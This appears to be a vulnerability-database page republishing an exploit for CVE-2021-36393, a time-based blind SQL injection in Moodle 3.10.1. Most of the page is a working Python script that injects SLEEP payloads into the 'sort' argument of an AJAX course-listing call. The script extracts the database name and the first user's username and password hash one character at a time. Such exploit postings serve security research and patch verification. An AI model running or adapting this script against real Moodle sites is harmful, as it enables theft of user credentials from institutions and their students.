Moodle 3.10.1 SQL Injection

🗓️ 15 Apr 2024 00:00:00Reported by Julio Ángel FerrariType

packetstorm🔗 packetstormsecurity.com👁 340 Views

Moodle 3.10.1 SQL Injection, CVE-2021-36393, Time-Based Blind SQL Injectio

Reporter	Title	Published	Views	Family All 67
0day.today	Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - (sort) parameter Exploit	12 Apr 202400:00	–	zdt
GithubExploit	Exploit for Server-Side Request Forgery in Moodle	4 Nov 202311:45	–	githubexploit
GithubExploit	Exploit for SQL Injection in Moodle	27 Oct 202317:13	–	githubexploit
GithubExploit	Exploit for SQL Injection in Moodle	4 Nov 202311:45	–	githubexploit
BDU FSTEC	The vulnerability of the Moodle management system, related to the failure to protect SQL queries, allows attackers to execute arbitrary code.	5 Aug 202100:00	–	bdu_fstec
Circl	CVE-2021-36393	2 Feb 202217:41	–	circl
CNNVD	Moodle SQL注入漏洞	19 Jul 202100:00	–	cnnvd
CVE	CVE-2021-36393	6 Mar 202300:00	–	cve
Cvelist	CVE-2021-36393	6 Mar 202300:00	–	cvelist
Exploit DB	Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - "sort" parameter	12 Apr 202400:00	–	exploitdb

`# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter  
# Google Dork:   
# Date: 04/11/2023  
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)  
# Vendor Homepage: https://moodle.org/  
# Software Link:   
# Version: 3.10.1  
# Tested on: Linux  
# CVE : CVE-2021-36393  
  
import requests  
import string  
from termcolor import colored  
  
# Request details  
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"  
HEADERS = {  
"Accept": "application/json, text/javascript, */*; q=0.01",  
"Content-Type": "application/json",  
"X-Requested-With": "XMLHttpRequest",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",  
"Origin": "http://127.0.0.1:8080",  
"Referer": "http://127.0.0.1:8080/moodle/my/",  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",  
"Connection": "close"  
}  
  
# Characters to test  
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"  
  
def test_character(payload):  
response = requests.post(URL, headers=HEADERS, json=[payload])  
return response.elapsed.total_seconds() >= 3  
  
def extract_value(column, label):  
base_payload = {  
"index": 0,  
"methodname": "core_course_get_enrolled_courses_by_timeline_classification",  
"args": {  
"offset": 0,  
"limit": 0,  
"classification": "all",  
"sort": "",  
"customfieldname": "",  
"customfieldvalue": ""  
}  
}  
  
result = ""  
for _ in range(50): # Assumes a maximum of 50 characters for the value  
character_found = False  
for character in characters_to_test:  
if column == "database()":  
base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"  
else:  
base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"  
  
if test_character(base_payload):  
result += character  
print(colored(f"{label}: {result}", 'red'), end="\r")  
character_found = True  
break  
  
if not character_found:  
break  
  
# Print the final result  
print(colored(f"{label}: {result}", 'red'))  
  
if __name__ == "__main__":  
extract_value("database()", "Database")  
extract_value("username", "Username")  
extract_value("password", "Password")  
  
  
`

15 Apr 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8

EPSS0.23988

SSVC